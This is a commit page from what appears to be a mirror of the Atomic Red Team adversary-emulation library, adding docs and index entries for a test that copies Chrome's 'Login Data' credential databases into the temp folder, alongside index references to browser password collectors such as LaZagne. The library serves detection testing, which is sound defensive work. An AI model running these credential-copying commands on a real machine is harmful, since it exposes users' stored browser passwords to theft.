security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2021-09-15 02:11:02 +00:00
parent 358124ee2d
commit 2a6a82f945
6 changed files with 84 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -21,6 +21,7 @@ credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
21 credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
22 credential-access T1555.003 Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
23 credential-access T1555.003 Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
24 credential-access T1555.003 Credentials from Web Browsers 4 Simulating access to Chrome Login Data 3d111226-d09a-4911-8715-fe11664f960d powershell
25 credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
26 credential-access T1552.002 Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
27 credential-access T1003.006 DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
atomics/Indexes/Indexes-CSV/windows-index.csv
+1
View File
@@ -10,6 +10,7 @@ credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials
credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
10 credential-access T1555 Credentials from Password Stores 5 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] bc071188-459f-44d5-901a-f8f2625b2d2e powershell
11 credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
12 credential-access T1555.003 Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
13 credential-access T1555.003 Credentials from Web Browsers 4 Simulating access to Chrome Login Data 3d111226-d09a-4911-8715-fe11664f960d powershell
14 credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
15 credential-access T1552.002 Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
16 credential-access T1003.006 DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -35,6 +35,7 @@
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- Atomic Test #4: Simulating access to Chrome Login Data [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
atomics/Indexes/Indexes-Markdown/windows-index.md
+1
View File
@@ -20,6 +20,7 @@
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- Atomic Test #4: Simulating access to Chrome Login Data [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
atomics/Indexes/index.yaml
+28
View File
@@ -1412,6 +1412,34 @@ credential-access:
name: command_prompt
elevation_required: true
command: "#{lazagne_path} browsers\n"
- name: Simulating access to Chrome Login Data
auto_generated_guid: 3d111226-d09a-4911-8715-fe11664f960d
description: "Simulates an adversary accessing encrypted credentials from Google
Chrome Login database. \n"
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Chrome must be installed
'
prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
-Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
{exit 0} else {exit 1}
get_prereq_command: |
$installer = "$env:temp\ChromeStandaloneSetup64.msi"
Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
msiexec /i $installer /qn
Start-Process -FilePath "chrome.exe"
Stop-Process -Name "chrome"
executor:
name: powershell
command: |
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination $env:temp
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination $env:temp
cleanup_command: |
Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore
Remove-Item -Path "$env:temp\Login Data For Account" -Force -ErrorAction Ignore
T1552.002:
technique:
created: '2020-02-04T12:58:40.678Z'
atomics/T1555.003/T1555.003.md
+52
View File
@@ -18,6 +18,8 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
- [Atomic Test #3 - LaZagne - Credentials from Browser](#atomic-test-3---lazagne---credentials-from-browser)
- [Atomic Test #4 - Simulating access to Chrome Login Data](#atomic-test-4---simulating-access-to-chrome-login-data)
<br/>
@@ -158,4 +160,54 @@ Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.
<br/>
<br/>
## Atomic Test #4 - Simulating access to Chrome Login Data
Simulates an adversary accessing encrypted credentials from Google Chrome Login database.
**Supported Platforms:** Windows
**auto_generated_guid:** 3d111226-d09a-4911-8715-fe11664f960d
#### Attack Commands: Run with `powershell`!
```powershell
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination $env:temp
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination $env:temp
```
#### Cleanup Commands:
```powershell
Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore
Remove-Item -Path "$env:temp\Login Data For Account" -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Chrome must be installed
##### Check Prereq Commands:
```powershell
if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
$installer = "$env:temp\ChromeStandaloneSetup64.msi"
Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
msiexec /i $installer /qn
Start-Process -FilePath "chrome.exe"
Stop-Process -Name "chrome"
```
<br/>